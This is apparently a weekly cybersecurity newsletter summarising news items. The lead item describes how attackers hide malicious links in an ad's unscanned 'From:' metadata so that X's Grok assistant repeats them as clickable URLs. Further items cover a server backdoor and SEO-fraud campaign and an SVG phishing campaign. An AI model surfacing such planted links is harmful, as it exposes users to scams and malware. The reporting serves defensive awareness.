Brief #120: Grok AI Exploited, Shadow AI Surge 200%, LOTL Attacks Increase by 84%

Happy Sunday!

The disconnect between C-suite confidence and frontline reality continues to widen, with executives feeling twice as confident about cyber readiness compared to the managers actually dealing with daily threats.

In this week's brief:

• Threat actors are getting creative by exploiting Grok AI on X to spread malicious links through hidden metadata fields
• Shadow AI usage has exploded 200% across enterprises, with companies now juggling an average of 320 AI applications outside IT oversight
• SOC analyst burnout is reaching crisis levels due to chaotic scheduling and toxic management practices at understaffed centers

A quick note before we dive in.

Industry News

Threat Actors Abuse X's Grok AI to Spread Malicious Links

• Malicious advertisers are exploiting a loophole where they hide malicious links in the "From:" metadata field of video ads on X, which isn't scanned by the platform's security filters.

• When users ask Grok about these posts, the AI assistant extracts and shares the hidden links as clickable URLs, effectively bypassing X's link posting restrictions while gaining credibility from Grok's trusted system account status.

• This technique, dubbed "Grokking" by researcher Nati Tal, has helped some malicious ads reach millions of impressions, leading to various scams and information-stealing malware.

GhostRedirector Poisons Windows Servers with Backdoors and SEO Fraud Tools

• ESET researchers identified a China-aligned threat actor named GhostRedirector that compromised at least 65 Windows servers primarily in Brazil, Thailand, and Vietnam using a passive C++ backdoor (Rungan) and a malicious IIS module (Gamshen) for SEO fraud.

• The attackers use EfsPotato and BadPotato exploits to create privileged users on compromised servers, ensuring persistent access even if their malware is removed, and deploy various webshells for maintaining access to the systems.

• GhostRedirector's SEO fraud scheme uses the Gamshen module to manipulate Google search results by hijacking responses only for Googlebot requests, artificially promoting gambling websites without affecting regular visitors of the compromised sites.

VirusTotal Uncovers Undetected Colombian Malware Campaign Using SVG Files

• VirusTotal's Code Insight detected a sophisticated phishing campaign impersonating the Colombian justice system through SVG files that went completely undetected by all antivirus engines.

• The malicious SVGs execute embedded JavaScript to render a fake government portal, simulate a document download with progress bar, while secretly downloading a malicious ZIP archive in the background.

• Investigation revealed 523 samples dating back to August 2025, with attackers using polymorphism techniques and Spanish-language code comments to evade detection while targeting Colombian users via email.